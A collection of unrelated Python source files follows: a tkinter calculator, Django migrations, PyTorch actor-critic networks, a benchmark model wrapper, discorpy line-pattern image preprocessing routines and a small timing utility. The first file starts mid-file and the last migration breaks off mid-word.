Button(root, text='3', width=w, command=lambda: get_variables(3), bd=border, height=h).grid(row=2, column=2)
Button(root, text='4', width=w, command=lambda: get_variables(4), bd=border, height=h).grid(row=3, column=0)
Button(root, text='5', width=w, command=lambda: get_variables(5), bd=border, height=h).grid(row=3, column=1)
Button(root, text='6', width=w, command=lambda: get_variables(6), bd=border, height=h).grid(row=3, column=2)
Button(root, text='7', width=w, command=lambda: get_variables(7), bd=border, height=h).grid(row=4, column=0)
Button(root, text='8', width=w, command=lambda: get_variables(8), bd=border, height=h).grid(row=4, column=1)
Button(root, text='9', width=w, command=lambda: get_variables(9), bd=border, height=h).grid(row=4, column=2)

# adding operator buttons
Button(root, text='AC\n©Vasu', width=w, command=lambda: clearAll(), bd=border, height=h).grid(row=5, column=0)
Button(root, text='0', width=w, command=lambda: get_variables(0), bd=border, height=h).grid(row=5, column=1)
Button(root, text='=', width=w, command=lambda: answer(), bd=border, height=h).grid(row=5, column=2)
Button(root, text='+', width=w, command=lambda:
get_operation('+'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=2,column=3) Button(root, text='-', width=w, command=lambda : get_operation('-'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=3,column=3) Button(root, text='x', width=w, command=lambda : get_operation('*'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=4,column=3) Button(root, text='/', width=w, command=lambda : get_operation('/'), bg='#FF9500',fg='White', bd=border,height=h).grid(row=5,column=3) #adding new operations Button(root, text='pi', width=w, command=lambda : get_operation('3.14'), bg='Grey',fg='White',bd=border,height=h).grid(row=2,column=4) Button(root, text='%', width=w, command=lambda : get_operation('%'), bg='Grey',fg='White',bd=border,height=h).grid(row=3,column=4) Button(root, text='(', width=w, command=lambda : get_operation('('), bg='Grey',fg='White',bd=border,height=h).grid(row=4,column=4) Button(root, text='exp', width=w, command=lambda : get_operation('**'), bg='Grey',fg='White',bd=border,height=h).grid(row=5,column=4) Button(root, text='del', width=w, command=lambda :delete(), bg='Grey',fg='White',bd=border,height=h).grid(row=2,column=5) Button(root, text='sqrt', width=w, command=lambda : get_operation('**0.5'), bg='Grey',fg='White',bd=border,height=h).grid(row=3,column=5) Button(root, text=')', width=w, command=lambda : get_operation(')'), bg='Grey',fg='White',bd=border,height=h).grid(row=4,column=5) Button(root, text='^2', width=w, command=lambda : get_operation('**2'), bg='Grey',fg='White',bd=border,height=h).grid(row=5,column=5) root.mainloop()# -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-10-20 21:19 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Board', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('slug', models.SlugField(blank=True, unique=True)), ], ), migrations.CreateModel( name='Task', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.TextField()), ('status', models.CharField(choices=[(1, 'To be done'), (2, 'Work in progress'), (3, 'Done'), (4, 'Wish')], default=4, max_length=20)), ('due_date', models.DateField(blank=True, null=True)), ('start_date', models.DateField(blank=True, null=True)), ('end_date', models.DateField(blank=True, null=True)), ('creation_date', models.DateField(auto_now_add=True)), ('assignee', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ('board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='todo.Board')), ], ), ] ch8/function_approximator/deep.py0 import torch class Actor(torch.nn.Module): def __init__(self, input_shape, actor_shape, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent Actor in an Actor-Critic algorithm The Policy is parametrized using a Gaussian distribution with mean mu and variance sigma The Actor's policy parameters (mu, sigma) are output by the deep CNN implemented in this class. :param input_shape: Shape of each of the observations :param actor_shape: Shape of the actor's output. 
Typically the shape of the actions :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(Actor, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64 * 7 * 7, 512), torch.nn.ReLU()) self.actor_mu = torch.nn.Linear(512, actor_shape) self.actor_sigma = torch.nn.Linear(512, actor_shape) def forward(self, x): """ Forward pass through the Actor network. Takes batch_size x observations as input and produces mu and sigma as the outputs :param x: The observations :return: Mean (mu) and Sigma (sigma) for a Gaussian policy """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) actor_mu = self.actor_mu(x) actor_sigma = self.actor_sigma(x) return actor_mu, actor_sigma class DiscreteActor(torch.nn.Module): def __init__(self, input_shape, actor_shape, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent Actor in an Actor-Critic algorithm The Policy is parametrized using a categorical/discrete distribution with logits The Actor's policy parameters (logits) are output by the deep CNN implemented in this class. :param input_shape: Shape of each of the observations :param actor_shape: Shape of the actor's output. Typically the shape of the actions :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(DiscreteActor, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64 * 7 * 7, 512), torch.nn.ReLU()) self.logits = torch.nn.Linear(512, actor_shape) def forward(self, x): """ Forward pass through the Actor network. Takes batch_size x observations as input and produces mu and sigma as the outputs :param x: The observations :return: Mean (mu) and Sigma (sigma) for a Gaussian policy """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) logits = self.logits(x) return logits class Critic(torch.nn.Module): def __init__(self, input_shape, critic_shape=1, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent the Critic in an Actor-Critic algorithm :param input_shape: Shape of each of the observations :param critic_shape: Shape of the Critic's output. 
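# A short sketch of where the 64 * 7 * 7 flatten size used by layer4 in the
# networks above comes from, assuming 84x84 observations (an assumption of this
# sketch; the input resolution is not stated in this file) and the usual
# floor((size - kernel) / stride) + 1 rule for padding-free convolutions.
def _conv_out(size: int, kernel: int, stride: int) -> int:
    return (size - kernel) // stride + 1

_side = 84                        # assumed input height/width
_side = _conv_out(_side, 8, 4)    # layer1: 84 -> 20
_side = _conv_out(_side, 3, 2)    # layer2: 20 -> 9
_side = _conv_out(_side, 3, 1)    # layer3: 9 -> 7
assert 64 * _side * _side == 64 * 7 * 7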
Typically 1 :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(Critic, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64* 7 * 7, 512), torch.nn.ReLU()) self.critic = torch.nn.Linear(512, critic_shape) def forward(self, x): """ Forward pass through the Critic network. Takes batch_size x observations as input and produces the value estimate as the output :param x: The observations :return: Mean (mu) and Sigma (sigma) for a Gaussian policy """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) critic = self.critic(x) return critic class ActorCritic(torch.nn.Module): def __init__(self, input_shape, actor_shape, critic_shape, device=torch.device("cpu")): """ Deep convolutional Neural Network to represent both policy (Actor) and a value function (Critic). The Policy is parametrized using a Gaussian distribution with mean mu and variance sigma The Actor's policy parameters (mu, sigma) and the Critic's Value (value) are output by the deep CNN implemented in this class. :param input_shape: Shape of each of the observations :param actor_shape: Shape of the actor's output. Typically the shape of the actions :param critic_shape: Shape of the Critic's output. Typically 1 :param device: The torch.device (cpu or cuda) where the inputs and the parameters are to be stored and operated """ super(ActorCritic, self).__init__() self.device = device self.layer1 = torch.nn.Sequential(torch.nn.Conv2d(input_shape[2], 32, 8, stride=4, padding=0), torch.nn.ReLU()) self.layer2 = torch.nn.Sequential(torch.nn.Conv2d(32, 64, 3, stride=2, padding=0), torch.nn.ReLU()) self.layer3 = torch.nn.Sequential(torch.nn.Conv2d(64, 64, 3, stride=1, padding=0), torch.nn.ReLU()) self.layer4 = torch.nn.Sequential(torch.nn.Linear(64* 7 * 7, 512), torch.nn.ReLU()) self.actor_mu = torch.nn.Linear(512, actor_shape) self.actor_sigma = torch.nn.Linear(512, actor_shape) self.critic = torch.nn.Linear(512, critic_shape) def forward(self, x): """ Forward pass through the Actor-Critic network. Takes batch_size x observations as input and produces mu, sigma and the value estimate as the outputs :param x: The observations :return: Mean (actor_mu), Sigma (actor_sigma) for a Gaussian policy and the Critic's value estimate (critic) """ x.requires_grad_() x = x.to(self.device) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = x.view(x.shape[0], -1) x = self.layer4(x) actor_mu = self.actor_mu(x) actor_sigma = self.actor_sigma(x) critic = self.critic(x) return actor_mu, actor_sigma, critic from torchbenchmark.util.framework.vision.model_factory import TorchVisionModel from torchbenchmark.tasks import COMPUTER_VISION class Model(TorchVisionModel): task = COMPUTER_VISION.CLASSIFICATION # Train batch size: use the training batch in paper. 
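# A hedged sketch of how the (mu, sigma) heads of the Actor/ActorCritic
# networks above are commonly turned into a stochastic policy. Making sigma
# positive with softplus is an assumption of this sketch; the classes above
# only emit raw linear outputs and do not fix that choice.
import torch
import torch.nn.functional as F


def sample_gaussian_action(actor_mu: torch.Tensor, actor_sigma: torch.Tensor):
    sigma = F.softplus(actor_sigma) + 1e-5           # keep the scale strictly positive
    dist = torch.distributions.Normal(actor_mu, sigma)
    action = dist.sample()
    return action, dist.log_prob(action).sum(dim=-1)


# Example with a batch of 4 two-dimensional actions.
_mu = torch.zeros(4, 2)
_raw_sigma = torch.zeros(4, 2)
_action, _log_prob = sample_gaussian_action(_mu, _raw_sigma)
assert _action.shape == (4, 2) and _log_prob.shape == (4,)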
# Source: https://arxiv.org/pdf/1608.06993.pdf DEFAULT_TRAIN_BSIZE = 256 DEFAULT_EVAL_BSIZE = 64 def __init__(self, test, device, jit=False, batch_size=None, extra_args=[]): super().__init__(model_name="densenet121", test=test, device=device, jit=jit, batch_size=batch_size, extra_args=extra_args) #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sun Nov 10 16:02:37 2019 @author: tyler """ from cnn import build_cnn is_training = True batch_size = 7 height = 32 width = 256 channels = 1 o,i =build_cnn(is_training, batch_size, height, width, channels)OKThess/website # -*- coding: utf-8 -*- # Generated by Django 1.11.5 on 2018-06-21 16:19 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('main', '0064_weekendapplication'), ] operations = [ migrations.AddField( model_name='weekendapplication', name='accept_terms', field=models.BooleanField(default=False), ), migrations.AddField( model_name='weekendapplication', name='email', field=models.EmailField(default='', max_length=254), preserve_default=False, ), migrations.AddField( model_name='weekendapplication', name='first_name', field=models.TextField(default='first_name'), preserve_default=False, ), migrations.AddField( model_name='weekendapplication', name='last_name', field=models.TextField(default='last_name'), preserve_default=False, ), migrations.AddField( model_name='weekendapplication', name='specialization', field=models.TextField(default='specialization'), preserve_default=False, ), ] # ============================================================================ # Copyright (c) 2018 Diamond Light Source Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ # Author: # E-mail: # Publication date: 21 November 2021 # ============================================================================ # Contributors: # ============================================================================ """ Module of pre-processing methods for handling a line-pattern image: - Determine the slopes and distances between lines. - Extract points belong to a line. - Convert a chessboard image to a line-pattern image. """ import numpy as np import scipy.ndimage as ndi from skimage.transform import radon import discorpy.prep.preprocessing as prep def locate_subpixel_point(list_point, option="min"): """ Locate the extremum point of a 1D array with subpixel accuracy. Parameters ---------- list_point : array_like 1D array. option : {"min", "max"} To locate the minimum point or the maximum point. Returns ------- float Subpixel position of the extremum point. 
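# A tiny numeric sketch of the idea behind locate_subpixel_point in this
# module: fit a parabola a*x^2 + b*x + c through the samples and take its
# vertex -b / (2a) as the subpixel extremum. The sample values are arbitrary.
import numpy as np

_samples = np.array([4.0, 1.0, 2.0])                # discrete minimum at index 1
_a, _b, _c = np.polyfit(np.arange(len(_samples)), _samples, 2)
_subpixel_pos = -_b / (2 * _a)                      # = 1.25 for these values
assert 1.0 < _subpixel_pos < 1.5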
""" num_point = len(list_point) a, b, c = np.polyfit(np.arange(num_point), list_point, 2) if option == "min": pos = np.argmin(list_point) else: pos = np.argmax(list_point) if a != 0.0: num = - b / (2 * a) if (num >= 0) and (num < num_point): pos = num return pos def get_local_extrema_points(list_data, option="min", radius=7, sensitive=0.1, denoise=True, norm=True, subpixel=True): """ Get a list of local extremum points from a 1D array. Parameters ---------- list_data : array_like 1D array. option : {"min", "max"} To get minimum points or maximum points radius : int Search radius. Used to locate extremum points. sensitive : float To detect extremum points against random noise. Smaller is more sensitive. denoise : bool, optional Applying a smoothing filter if True. norm : bool, optional Apply background normalization to the array. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- array_like 1D array. Positions of local extremum points. """ if denoise is True: list_data = ndi.gaussian_filter(list_data, 3) num_point = len(list_data) radius = np.clip(radius, 1, num_point // 4) if norm is True: xlist = np.arange(num_point) mat_comb = np.asarray(np.vstack((xlist, list_data))) mat_sort = mat_comb[:, mat_comb[1, :].argsort()] list_sort = mat_sort[1] ndrop = int(0.25 * num_point) (a1, a0) = np.polyfit(xlist[ndrop:-ndrop - 1], list_sort[ndrop:-ndrop - 1], 1) list_fit = a1 * xlist + a0 l_thres, u_thres = a0, a1 * xlist[-1] + a0 list_sort[(list_fit >= l_thres) & (list_fit <= u_thres)] = list_fit[ (list_fit >= l_thres) & (list_fit <= u_thres)] mat_sort[1] = list_sort nmean = np.mean(np.abs(list_fit)) backgr = mat_sort[:, mat_sort[0, :].argsort()][1] list_data = np.divide(list_data, backgr, out=nmean * np.ones_like(list_data), where=backgr != 0) points = [] for i in range(radius, num_point - radius - 1, 1): val, pos = list_data[i], i if option == "max": list_sort = np.sort(list_data[i - radius:i + radius + 1]) num1 = list_sort[-1] - val nmean = np.mean(list_sort[:radius + 1]) num2 = np.abs((val - nmean) / nmean) if nmean != 0 else 0.0 if (num1 == 0.0) and (num2 > sensitive): if subpixel is True: pos = i - 1 + locate_subpixel_point(list_data[i - 1:i + 2], option=option) points.append(pos) else: list_sort = np.sort(list_data[i - radius:i + radius + 1]) num1 = list_sort[0] - val nmean = np.mean(list_sort[-radius:]) num2 = np.abs((val - nmean) / nmean) if nmean != 0 else 0.0 if (num1 == 0.0) and (num2 > sensitive): if subpixel is True: pos = i - 1 + locate_subpixel_point(list_data[i - 1:i + 2], option=option) points.append(pos) return np.asarray(points) def _make_circle_mask(width, ratio): """ Create a circle mask. Parameters ----------- width : int Width of a square array. ratio : float Ratio between the diameter of the mask and the width of the array. Returns ------ array_like Square array. """ mask = np.zeros((width, width), dtype=np.float32) center = width // 2 radius = ratio * center y, x = np.ogrid[-center:width - center, -center:width - center] mask_check = x * x + y * y <= radius * radius mask[mask_check] = 1.0 return mask def calc_slope_distance_hor_lines(mat, ratio=0.3, search_range=30.0, radius=9, sensitive=0.1, bgr="bright", denoise=True, norm=True, subpixel=True): """ Calculate the representative distance between horizontal lines and the representative slope of these lines using the ROI around the middle of a line-pattern image. Parameters ---------- mat : array_like 2D array. ratio : float Used to select the ROI around the middle of an image. 
search_range : float Search range in Degree to determine the slope of lines. radius : int Search radius. Used to locate lines. sensitive : float To detect lines against random noise. Smaller is more sensitive. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. denoise : bool, optional Applying a smoothing filter if True. norm : bool, optional Apply background normalization to the array. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- slope : float Slope of horizontal lines in Radian. distance : float Distance between horizontal lines. """ if denoise is True: mat = ndi.gaussian_filter(mat, 3) mat_roi = prep._select_roi(mat, ratio, square=True) if bgr == "bright": mat_roi = np.max(mat_roi) - mat_roi angle_coarse = 90.0 + np.arange(-search_range, search_range + 1.0) mask = _make_circle_mask(mat_roi.shape[0], 0.92) sinogram1 = radon(mat_roi * mask, theta=angle_coarse, circle=True) list_max1 = np.amax(sinogram1, axis=0) pos_max1 = np.argmax(list_max1) best_angle1 = angle_coarse[pos_max1] angle_fine = np.arange(best_angle1 - 1.0, best_angle1 + 1.05, 0.05) sinogram2 = radon(mat_roi * mask, theta=angle_fine, circle=True) list_max2 = np.amax(sinogram2, axis=0) pos_max2 = np.argmax(list_max2) best_angle2 = -(angle_fine[pos_max2] - 90) slope = np.tan(best_angle2 * np.pi / 180.0) list_ext_point = get_local_extrema_points(sinogram2[:, pos_max2], option="max", radius=radius, denoise=denoise, norm=norm, subpixel=subpixel, sensitive=sensitive) if len(list_ext_point) > 3: distance = np.median(np.abs(np.diff(list_ext_point))) else: distance = np.mean(np.abs(np.diff(list_ext_point))) return slope, distance def calc_slope_distance_ver_lines(mat, ratio=0.3, search_range=30.0, radius=9, sensitive=0.1, bgr="bright", denoise=True, norm=True, subpixel=True): """ Calculate the representative distance between vertical lines and the representative slope of these lines using the ROI around the middle of a line-pattern image. Parameters ---------- mat : array_like 2D array. ratio : float Used to select the ROI around the middle of an image. search_range : float Search range in Degree to determine the slope of lines. radius : int Search radius. Used to locate lines. sensitive : float To detect lines against random noise. Smaller is more sensitive. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. denoise : bool, optional Applying a smoothing filter if True. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- slope : float Slope of vertical lines in Radian. distance : float Distance between vertical lines. 
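# A hedged end-to-end sketch for calc_slope_distance_hor_lines above. It
# assumes discorpy (for prep._select_roi and normalization) and scikit-image
# are importable, exactly as at the top of this module. The synthetic image has
# perfectly horizontal dark lines every 15 pixels on a bright background, so
# the recovered slope should be close to 0 and the distance close to 15.
import numpy as np


def _slope_distance_example():
    img = np.ones((300, 300), dtype=np.float32)
    img[::15, :] = 0.0                               # dark horizontal lines, period 15
    slope, distance = calc_slope_distance_hor_lines(img, ratio=0.3, radius=5,
                                                    bgr="bright")
    print(slope, distance)                           # expected: roughly 0.0 and 15.0
    return slope, distance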
""" if denoise is True: mat = ndi.gaussian_filter(mat, 3) mat_roi = prep._select_roi(mat, ratio, square=True) if bgr == "bright": mat_roi = np.max(mat_roi) - mat_roi angle_coarse = np.arange(-search_range, search_range + 1.0) mask = _make_circle_mask(mat_roi.shape[0], 0.92) sinogram1 = radon(mat_roi * mask, theta=angle_coarse, circle=True) list_max1 = np.amax(sinogram1, axis=0) pos_max1 = np.argmax(list_max1) best_angle1 = angle_coarse[pos_max1] angle_fine = np.arange(best_angle1 - 1.0, best_angle1 + 1.05, 0.05) sinogram2 = radon(mat_roi * mask, theta=angle_fine, circle=True) list_max2 = np.amax(sinogram2, axis=0) pos_max2 = np.argmax(list_max2) best_angle2 = angle_fine[pos_max2] slope = np.tan(best_angle2 * np.pi / 180.0) list_ext_point = get_local_extrema_points(sinogram2[:, pos_max2], option="max", radius=radius, denoise=denoise, norm=norm, subpixel=subpixel, sensitive=sensitive) if len(list_ext_point) > 3: distance = np.median(np.abs(np.diff(list_ext_point))) else: distance = np.mean(np.abs(np.diff(list_ext_point))) return slope, distance def _calc_index_range(height, width, angle_deg, direction): """ Calculate extractable range of tilted line-profile. Positive angle is counterclockwise. Parameters ---------- height : int Height of the image. width : int Width of the image. angle_deg : float Tilted angle in Degree. direction : {"horizontal", "vertical"} Direction of line-profile. Returns ------- min_idx : int Minimum index of lines. max_idx : int Maximum index of lines. """ angle = angle_deg * np.pi / 180.0 if direction == "horizontal": if np.abs(angle_deg) == 90.0: raise ValueError("If the input angle is around 90-degree, use " "the 'vertical' option and update the angle to " "around 0-degree instead!!!") else: if angle_deg > 0: min_idx = int(np.ceil(width * np.tan(angle))) max_idx = height - 1 else: min_idx = 0 max_idx = height - 1 - int( np.floor(width * np.tan(np.abs(angle)))) if (min_idx < 0) or (min_idx >= height) or (max_idx < 0) or ( max_idx >= height): raise ValueError("Row index is out of range, please select " "the direction correctly !!!") else: if np.abs(angle_deg) == 90.0: raise ValueError("If the input angle is around 90-degree, use " "the 'horizontal' option and update the angle to " "around 0-degree instead!!!") else: if angle_deg > 0: min_idx = 0 max_idx = width - 1 - int(np.ceil(height * np.tan(angle))) else: min_idx = int(np.floor(height * np.tan(np.abs(angle)))) max_idx = width - 1 if (min_idx < 0) or (min_idx >= width) or (max_idx < 0) or ( max_idx >= width): raise ValueError("Column index is out of range, please select " "the direction correctly !!!") return min_idx, max_idx def get_tilted_profile(mat, index, angle_deg, direction): """ Get the intensity-profile along a tilted line across an image. Positive angle is counterclockwise. Parameters ---------- mat : array_like 2D array. index : int Index of the line. angle_deg : float Tilted angle in Degree. direction : {"horizontal", "vertical"} Direction of line-profile. Returns ------- xlist : array_like 1D array. x-positions of points on the line. ylist : array_like 1D array. y-positions of points on the line. profile : array_like 1D array. Intensities of points on the line. 
""" if mat.ndim != 2: raise ValueError("Input must be a 2D array !!!") (height, width) = mat.shape (min_idx, max_idx) = _calc_index_range(height, width, angle_deg, direction) angle = angle_deg * np.pi / 180.0 if (index < min_idx) or (index > max_idx): raise ValueError("Input index is out of possible range: " "[{0}, {1}]".format(min_idx, max_idx)) if direction == "horizontal": rlist = np.linspace(0, np.floor(width / np.cos(angle)), width) xlist = rlist * np.cos(angle) ylist = rlist * np.sin(-angle) xlist = np.clip(xlist, 0, width - 1) ylist = np.clip(index + ylist, 0, height - 1) ymin = np.int16(np.floor(np.amin(ylist))) ymax = np.int16(np.ceil(np.amax(ylist))) + 1 indices = ylist - ymin, xlist profile = ndi.map_coordinates(mat[ymin:ymax, :], indices, order=3, mode='nearest') else: rlist = np.linspace(0, np.floor(height / np.cos(angle)), height) ylist = rlist * np.cos(angle) xlist = rlist * np.sin(angle) xlist = np.clip(index + xlist, 0, width - 1) ylist = np.clip(ylist, 0, height - 1) xmin = np.int16(np.floor(np.amin(xlist))) xmax = np.int16(np.ceil(np.amax(xlist))) + 1 indices = ylist, xlist - xmin profile = ndi.map_coordinates(mat[:, xmin:xmax], indices, order=3, mode='nearest') return xlist, ylist, profile def get_cross_points_hor_lines(mat, slope_ver, dist_ver, ratio=1.0, norm=True, offset=0, bgr="bright", radius=7, sensitive=0.1, denoise=True, subpixel=True): """ Get points on horizontal lines of a line-pattern image by intersecting with a list of generated vertical-lines. Parameters ---------- mat : array_like 2D array. slope_ver : float Slope in Radian of generated vertical lines. dist_ver : float Distance between two adjacent generated lines. ratio : float To adjust the distance between generated lines to get more/less lines. norm : bool, optional Apply background normalization to the array. offset : int Starting index of generated lines. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. radius : int Search radius. Used to locate extremum points. sensitive : float To detect extremum points against random noise. Smaller is more sensitive. denoise : bool, optional Applying a smoothing filter if True. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- array_like List of (y,x)-coordinates of points. """ (height, width) = mat.shape if bgr == "bright": mat = np.max(mat) - mat if norm is True: mat = prep.normalization_fft(mat, 5) if denoise is True: mat = ndi.gaussian_filter(mat, 3) angle = np.arctan(slope_ver) min_row, max_row = _calc_index_range(height, width, np.rad2deg(angle), direction="vertical") offset = np.clip(offset, 0, min(height, width) // 3) list_points = [] for i in np.arange(min_row + offset, max_row - offset, ratio * dist_ver): xlist, ylist, profile = get_tilted_profile(mat, i, np.rad2deg(angle), direction="vertical") scale = np.sqrt((xlist[-1] - xlist[0]) ** 2 + (ylist[-1] - ylist[0]) ** 2) / (height - 1) rlist = get_local_extrema_points(profile, option="max", radius=radius, sensitive=sensitive, denoise=not denoise, norm=not norm, subpixel=subpixel) * scale xlist1 = rlist * np.sin(angle) + xlist[0] ylist1 = rlist * np.cos(angle) + ylist[0] list_points.extend(np.asarray(list(zip(ylist1, xlist1)))) return np.asarray(list_points) def get_cross_points_ver_lines(mat, slope_hor, dist_hor, ratio=1.0, norm=True, offset=0, bgr="bright", radius=7, sensitive=0.1, denoise=True, subpixel=True): """ Get points on vertical lines of a line-pattern image by intersecting with a list of generated horizontal-lines. 
Parameters ---------- mat : array_like 2D array. slope_hor : float Slope in Radian of generated horizontal lines. dist_hor : float Distance between two adjacent generated lines. ratio : float To adjust the distance between generated lines to get more/less lines. norm : bool, optional Apply background normalization to the array. offset : int Starting index of generated lines. bgr : {"bright", "dark"} Specify the brightness of the background against the lines. radius : int Search radius. Used to locate extremum points. sensitive : float To detect extremum points against random noise. Smaller is more sensitive. denoise : bool, optional Applying a smoothing filter if True. subpixel : bool, optional Locate points with subpixel accuracy. Returns ------- array_like List of (y,x)-coordinates of points. """ (height, width) = mat.shape if bgr == "bright": mat = np.max(mat) - mat if norm is True: mat = prep.normalization_fft(mat, 5) if denoise is True: mat = ndi.gaussian_filter(mat, 3) angle = np.arctan(slope_hor) min_col, max_col = _calc_index_range(height, width, -np.rad2deg(angle), direction="horizontal") offset = np.clip(offset, 0, min(height, width) // 8) list_points = [] for i in np.arange(min_col + offset, max_col - offset, ratio * dist_hor): xlist, ylist, profile = get_tilted_profile(mat, i, -np.rad2deg(angle), direction="horizontal") scale = np.sqrt((xlist[-1] - xlist[0]) ** 2 + (ylist[-1] - ylist[0]) ** 2) / (width - 1) rlist = get_local_extrema_points(profile, option="max", radius=radius, sensitive=sensitive, denoise=not denoise, norm=not norm, subpixel=subpixel) * scale xlist1 = rlist * np.cos(angle) + xlist[0] ylist1 = rlist * np.sin(angle) + ylist[0] list_points.extend(np.asarray(list(zip(ylist1, xlist1)))) return np.asarray(list_points) def convert_chessboard_to_linepattern(mat, smooth=False, bgr="bright"): """ Convert a chessboard image to a line-pattern image. Parameters ---------- mat : array_like 2D array. smooth : bool, optional Apply a gaussian smoothing filter if True. bgr : {'bright', 'dark'} Select the background of the output image. Returns ------- array_like Line-pattern image. 
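# A short usage sketch for convert_chessboard_to_linepattern in this module:
# build a synthetic chessboard with 20-pixel squares and convert it. The output
# keeps the input shape, with the square boundaries turned into dark lines on a
# bright background when bgr="bright". Sizes are arbitrary.
import numpy as np

_cell = 20
_idx = np.arange(200) // _cell
_chessboard = ((_idx[:, None] + _idx[None, :]) % 2).astype(np.float32)
_line_pattern = convert_chessboard_to_linepattern(_chessboard, smooth=False, bgr="bright")
assert _line_pattern.shape == _chessboard.shape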
""" if smooth is True: mat = ndi.gaussian_filter(mat, 1, mode="nearest") mat_line = np.mean(np.abs(np.gradient(mat)), axis=0) if smooth is True: mat_line = np.pad(mat_line[4:-4, 4:-4], 4, mode="edge") else: mat_line = np.pad(mat_line[2:-2, 2:-2], 2, mode="edge") if bgr == "bright": mat_line = np.max(mat_line) - mat_line mat_line = mat_line / np.mean(np.abs(mat_line)) return mat_line 10-100 import logging from time import time log = logging.getLogger(__name__) class Timer(): def __init__(self, debug_msg=None): self._start = time() self._laps = [] self._last_lap = 0 self._lap_control = self._start self._stopped = 0 if debug_msg: log.debug(debug_msg) def lap(self, debug_msg=None): curr_time = time() self._last_lap = curr_time-self._lap_control self._lap_control = curr_time self._laps.append(self._last_lap) if debug_msg: log.debug(debug_msg) return self._last_lap def elapsed_time(self, debug_msg=None): total_time = time()-self._start if debug_msg: log.debug(debug_msg) return total_time def laps(self): return self._laps def last_lap(self): return self._last_lap def reset(self, debug_msg=None): self.__init__(debug_msg) def stringify_response_received(message_j): event = message_j["method"] request_id = message_j["params"]["requestId"] response = message_j["params"]["response"] url = response["url"] status = response["status"] headers = response["headers"] return '%s %s %s %s %s' % (event, request_id, status, url, headers) def stringify_request_will_be_sent(message_j): event = message_j["method"] request_id = message_j["params"]["requestId"] request = message_j["params"]["request"] method = request["method"] url = request["url"] headers = request["headers"] return '%s %s %s %s %s' % (event, request_id, method, url, headers) EVENT_STRINGIFIERS = { "Network.responseReceived": stringify_response_received, "Network.requestWillBeSent": stringify_request_will_be_sent } evalml/pipelines/components/transformers/imputers/__init__.py """Components that impute missing values in the input data.""" from .per_column_imputer import PerColumnImputer from .simple_imputer import SimpleImputer from .imputer import Imputer from .target_imputer import TargetImputer # Generated by Django 3.1.13 on 2021-11-10 13:37 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("aidants_connect_web", "0075_auto_20211110_1434"), ] operations = [ migrations.AddField( model_name="habilitationrequest", name="origin", field=models.CharField( choices=[ ("datapass", "Datapass"), ("responsable", "Responsable Structure"), ("autre", "Autre"), ], default="autre", max_length=150, verbose_name="Origine", ), ), migrations.AlterField( model_name="habilitationrequest", name="status", field=models.CharField( choices=[ ("new", "Nouvelle"), ("processing", "En cours"), ("validated", "Validée"), ("refused", 